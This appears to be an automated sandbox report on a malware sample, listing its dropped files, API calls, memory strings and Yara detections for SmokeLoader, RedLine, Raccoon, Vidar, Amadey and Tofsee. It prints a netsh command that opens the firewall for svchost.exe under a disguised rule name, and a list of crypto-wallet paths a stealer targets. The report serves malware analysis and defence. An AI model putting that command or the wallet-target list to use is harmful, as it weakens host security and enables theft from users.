                          Source: explorer.exe, 00000005.00000000.676184859.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.703934881.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.687023763.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                          Source: explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                          Source: explorer.exe, 00000005.00000000.708212604.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Progman
                          Source: explorer.exe, 00000005.00000000.704364672.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.687403349.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.676325321.0000000001080000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.765387857.0000000000CD0000.00000002.00020000.sdmp, 8A6B.exe, 0000000C.00000000.764420034.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: explorer.exe, 00000005.00000000.681077629.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.711046349.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.698401055.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FA5C.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FA5C.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00419EFB __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00419EFB __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                          barindex
                          Uses netsh to modify the Windows network and firewall settingsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Modifies the windows firewallShow sources
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.FA5C.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.FA5C.exe.3a8f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.FA5C.exe.3a8f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.824314083.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.824767570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.823843288.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.825252840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Amadeys stealer DLLShow sources
                          Source: Yara matchFile source: 00000030.00000002.933969192.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.871731514.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.859441391.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.933631329.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.872732523.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.872637287.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 16.2.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.1.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.95C6.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.adijaeg.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.1.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sbxGIUIhRd.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.921866016.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.920736016.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000030.00000002.934394338.00000000007C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.934464446.000000000081C000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: CFE8.exe PID: 4296, type: MEMORYSTR
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 19.2.E2A6.exe.560e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.gaystiqf.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.E2A6.exe.580000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E2A6.exe PID: 4752, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gaystiqf.exe PID: 4588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5288, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \ElectronCash\wallets\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: window-state.json
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: exodus.conf.json
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: info.seco
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: ElectrumLTC
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: passphrase.json
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \Ethereum\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: exodus.conf.json
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: file__0.localstorage
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: Ethereum
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: default_wallet
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: multidoge.wallet
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: seed.seco
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: keystore
                          Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                          Source: Yara matchFile source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: CFE8.exe PID: 4296, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: FA5C.exe PID: 1496, type: MEMORYSTR

                          Remote Access Functionality:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.FA5C.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.FA5C.exe.3a8f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.FA5C.exe.3a8f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.0.FA5C.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.824314083.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.824767570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.823843288.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000000.825252840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 16.2.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.1.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.95C6.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.adijaeg.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.1.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sbxGIUIhRd.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.921866016.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.920736016.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: CFE8.exe PID: 4296, type: MEMORYSTR
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 19.2.E2A6.exe.560e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.gaystiqf.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.E2A6.exe.580000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.raw.unpack, type: UNPACKEDPE
